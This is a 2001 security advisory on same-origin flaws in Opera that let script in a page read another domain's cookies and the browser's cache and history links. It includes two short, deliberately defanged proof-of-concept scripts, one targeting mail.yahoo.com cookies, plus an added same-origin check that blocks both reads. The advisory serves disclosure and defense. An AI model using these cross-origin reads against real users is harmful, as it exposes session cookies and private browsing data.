Opera is a multi-platform web browser. It contains several JavaScript vulnerabilities that allow script in an HTML page to programmatically access another page, and its properties, in a different domain. Netscape calls this the "Same Origin Vulnerability".
This allows a script in a web page to access cookies and links in arbitrary domains to which the user has access. A script can also read the links in the user's cache and history, which at least has privacy implications, if not more. In some cases, cookies and links in the cache/history may contain sensitive information such as usernames and passwords.
Credit:
The information has been provided by Georgi Guninski.
Examine the following scripts (note that '!' needs to be replaced with 'i' for the script to be active):
-(1)----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');
setTimeout('z=x.document.cookie;alert(z);',5000)</"+"scr!pt>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------
-(2)--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------
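The origin comparison that both scripts above get past, written out as an added example (it is not code from the advisory or from Opera). The function names `originOf`, `sameOrigin` and `checkAccess` and the `attacker.example` URL are assumptions made for illustration.

```javascript
// Added example: the same-origin comparison a browser is expected to apply
// before script in one window may read another window's document.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Returns the (scheme, host, port) tuple, or null for URLs whose origin is
// opaque (about:, data:, file: ...) and must therefore never match anything.
function originOf(url) {
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORTS[u.protocol], // default port is implicit
  };
}

function sameOrigin(callerUrl, targetUrl) {
  const a = originOf(callerUrl);
  const b = originOf(targetUrl);
  if (a === null || b === null) return false; // opaque origins never match
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Decision for a property read such as a.document.cookie or a.document.links.
function checkAccess(callerUrl, targetUrl, property) {
  const allowed = sameOrigin(callerUrl, targetUrl);
  const reason = allowed ? "same origin" : "cross-origin read blocked";
  return { property, allowed, reason };
}

const CALLER = "http://attacker.example/page.html"; // constructed sample URL
const cases = [
  [CALLER, "http://mail.yahoo.com/", "document.cookie"], // script (1)
  [CALLER, "about:cache", "document.links"],             // script (2)
  ["http://mail.yahoo.com/inbox", "http://mail.yahoo.com:80/", "document.cookie"],
  ["http://mail.yahoo.com/", "https://mail.yahoo.com/", "document.cookie"],
];
for (const [from, to, prop] of cases) {
  const r = checkAccess(from, to, prop);
  console.log(`${from} -> ${to} ${prop}: ${r.allowed ? "ALLOW" : "DENY"} (${r.reason})`);
}
```

Both reads from the advisory's scripts are denied by this comparison, while a page on mail.yahoo.com reading its own origin is allowed.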
In addition, the HotJava exploit at http://www.guninski.com/hotjava1-desc.html works on Opera as Jay@InfoAve.net pointed out.
Workaround:
Disable JavaScript (Opera suggests enabling "Use cookies to trace password protected documents").
Vendor status:
The vendor was notified on 5 November 2001 and was asked whether and when a fix would be issued. The reply was:
You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents", which means that pages with password protection aren't cached, cookies aren't stored, the URL shouldn't be displayed in History, etc. This is a "paranoia" option, and makes a few pages unusable. As you are probably aware, many web technologies aren't very secure, but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related information.